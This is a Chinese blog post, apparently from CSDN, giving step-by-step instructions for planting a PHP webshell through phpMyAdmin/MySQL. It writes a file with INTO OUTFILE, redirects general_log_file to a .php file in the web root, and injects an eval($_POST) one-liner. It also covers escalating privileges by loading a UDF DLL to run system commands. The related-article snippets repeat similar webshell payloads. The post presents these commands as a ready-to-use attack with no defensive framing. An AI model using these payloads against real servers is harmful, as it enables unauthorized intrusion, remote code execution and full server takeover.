mysql 开启日志 写shell_phpmyadmin日志拿shell拓展

最新推荐文章于 2023-09-19 15:35:42 发布
最新推荐文章于 2023-09-19 15:35:42 发布
阅读量204 收藏
点赞数
文章标签: mysql 开启日志 写shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28862113/article/details/113596581
版权

360f64826f3426084e50938e2d5663b3.png

224b444fb6044361f0d2fdcef1f57f20.png

phpmyadmin日志写shell:

利用条件:

有足够权限

“secure_file_priv”对应的值不能为NULL

secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。

secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。

secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。

phpmyadmin日志写shell:

SHOW VARIABLES LIKE "secure_file_priv"

如果不为空则可利用

select''INTO OUTFILE 'C:\phpStudy\PHPTutorial\WWW\door.php'

使用into outfile 写入一句话

phpmyadmin日志写shell:

select @@datadir

查看数据库路径 盲网站路径

show variables like '%general%';

查询日志开启状态

SET GLOBAL general_log='on'

开启日志

SET GLOBAL general_log_file='C:\phpstudy\www\xxx.php'

设置日志路径以及设置为脚本后缀

SELECT '<?php eval($_POST["cmd"]);?>'

查询一句话直接被写入进去 上菜刀连接

udf提权:

利用条件:

账号具有对Mysql的insert和delete权限

利用过程:

第一步:

获取相应权限后上传udf.php

第二步:

访问udf.php进行连接(需要能够远程连接)

第三步:

D:\xampp\mysql\lib\plugin\udf.dll

链接成功后导出DLL文件(注意目录)

mysql<5.0,导出路径随意; 5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32) mysql>5.1,需要导出到mysql的插件目录

查看插件目录:show variables like ‘%plugin%’;

第四步:

创建自定义函数:Create Function cmdshell returns string soname ‘udf.dll’

已经存在:drop function cmdshell;

第五步:

执行函数:select cmdshell(‘ipconfig’)

http://www.exploit-db.com/exploits/5092

喜欢 (5)or分享 (0)

郑丰彧
关注
pma:在Laravel Homestead盒子上安装phpMyAdmin的简单shell脚本
02-04
然而,有时我们需要使用像phpMyAdmin这样的图形数据库管理工具来直观地操作MySQL数据库。在本教程中,我们将详细讨论如何在Laravel Homestead上安装和配置phpMyAdmin,这将通过一个简单的shell脚本来实现。 首先,...
phpmyadmin——提权
weixin_53639243的博客
01-29 557
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置。用于 secur_file_priv 为null 或限定值 不在网页目录时。执行下面的sql语句,创建表并在表中入一句话木马,在导出到网站的根路径。2.secure_file_priv 不为null 具体描述在下边。general_log_file:日志保存路径。3.要知道网站的绝对路径,入马才能连接。
phpMyAdmin提权
Clannad的博客
01-10 1717
文章目录条件 条件 1、secure_file_priv的值不为NULL
phpMyadminMYSQL突破secure_file_privshell提权
失心少年
09-19 1137
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
Mysqlshell的几种方式
Redredredfish的博客
08-23 7918
Mysqlshell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfileshell 尝试通过outfile入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
通过MySQL入webshell的几种方式(小宇特详解)
小宇的web博客
08-07 5559
通过MySQL入webshell的几种方式 -01-通过outfileshell 利用条件 1.root权限2.网站的绝对路径且具有入权限,能够使用into outfile和into dumpfile来进行入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell入表中 利用条件 1.root权限2.网站
bitnami-docker-phpmyadmin:用于phpMyAdmin的Bitnami Docker映像
04-19
phpMyAdminMySQL和MariaDB上支持多种操作。 可以通过用户界面执行常用操作(管理数据库,表,列,关系,索引,用户,权限等),而您仍然可以直接执行任何SQL语句。 TL; DR Docker撰 $ curl -sSL ...
mysql离线安装版本脚本使用说明.md
12-17
- **步骤二**:使用数据库管理工具(如phpMyAdmin、Navicat等)尝试连接MySQL服务器。如果能够成功连接,则表明MySQL安装成功。 示例操作截图: - ![1581236009250](C:\Users\Administrator\AppData\Roaming\...
docker-lemp-stack:简单的Docker LEPM堆栈
05-09
还有PhpMyAdmin来管理数据库,而Portainer来管理Docker组件。 通过使用ACME质询获取Let's Encrypt证书,堆栈已准备好SSL。 为了将所有内容放在一起,有Traefik反向代理。 如何在Digital Ocean上安装基于Docker的...
LNMP:支持:Nginx 1.121.13 + MySQL 5.55.65.78.0(MariaDB 5.510.010.110.210.3)+ PHP 5.45.55.67.07.17.2 + phpMyAdmin(管理员)
02-04
MySQL 5.5/5.6/5.7/8.0 MariaDB 5.5/10.0/10.1/10.2/10.3 PHP 5.4/5.5/5.6/7.0/7.1/7.2 phpMyAdmin Adminer 使用源代码编译 OpenSSL 1.1.0f Nginx 1.13.7 PHP 7.2.0 正在安装 使用YUM软件包: sh -c " $( curl -...
php检测 Phpmyadmin提权漏洞演示
07-21
php检测 php检测 Phpmyadmin提权漏洞演示
phpmyadmin getshell到提权
blue_fantasy的博客
01-11 812
Text. 环境准备:win7,phpstudy(包含phpmyadmin,可用旧版) 开始攻击: 通过弱口令,信息收集,爆破等方式获知phpmyadmin的账号密码是root root 开始登录目标机器上的phpmyadmin 2.检测MySQL全局变量(generallog、generallog file)的值。 在SQL处输入sql语句: SHOW VARIABLES LIKE ‘general%’ 看到general log 指的是日志保存状态,一共有两个值(ON/OFF)ON
mysql 开启日志 shell_【安全科普】SQL语句利用日志shell及相关绕过
weixin_29001327的博客
01-27 587
原标题:【安全科普】SQL语句利用日志shell及相关绕过● 0x01 基本原理●在能够SQL语句的地方,outfile、dumpfile、drop database等都被禁止,一般进行SQL注入来getshell或删库的方式行不通了。但是如果MySQL是root用户启动的,那么可以进行如下利用:1showvariableslike'%general%'; #查看配置23setglobalge...
Mysql 后台日志shell(root权限)
haoge1998的博客
04-15 1852
Mysql shell 一、后台日志shell 前提: 需要有root权限 outfile被禁止 文件入被拦截 1、查看配置 是否开启日志 日志入路径 show variables like '%general%'; 2、开启general log模式为on set global general_log = on; 3、设置目录为shell地址 set global general_log_file = '/var/www/html'; 4、shell select '<?
PHP myAdmin提权
zkjsdk的博客
01-13 512
登录phpmyadmin 后台 默认密码root root 提权的关键点 绝对路径 开启日志 1.先判断日志是否打开 show global variables like ‘%general%’; 如果没开 执行以下语句 set global general_log = “ON”; show global variables like ‘%general%’; 2.设置路径 根据情况设置...
关于PHPMYADMIN的入侵提权拿服务器
热门推荐
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN的入侵提权拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system权限并读取管理员密码
Mr_Wanderer的博客
08-08 2349
文章目录配置靶机新建低权限用户安装phpstudy为phpstudy相关服务分配权限设置mysql权限设置Apache权限设置apache和MySQLa服务更换phpmyadmin版本漏洞原理使用MSF进行漏洞利用打开msf爆破靶机密码利用phpmyadmin漏洞进行攻击建立稳定连接生成反向连接木马攻击机开启端口监听,等待靶机连接攻击机上传木马并运行提权获取管理员账号和密码加载mimikatz迁移进程在最后亲测可行。如果本文有帮到您,求点赞留言~如果有任何疑问,请私信我 配置靶机 靶机操作系统选择wind
PhPmyadmin提权之FILE权限修改
weixin_67803112的博客
11-05 567
每一次渗透都是在开盲盒,永远不知道下一个难点在哪里……需要我们一次次尝试,一次次失败,一次次总结,才会把我们所谓的难点变成基操…..
phpmyadmin日志文件拿weshell
weixin_51692662的博客
09-22 984
phpmyadminshell
shell脚本安装phpmyadmin
最新发布
06-02
安装phpMyAdmin的方法因操作系统而异,以下是在Linux上安装phpMyAdmin的一般步骤: 1.打开终端并以root身份登录 2.使用包管理器安装PHP(如果尚未安装): - Debian/Ubuntu:apt-get install php - CentOS/Fedora...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值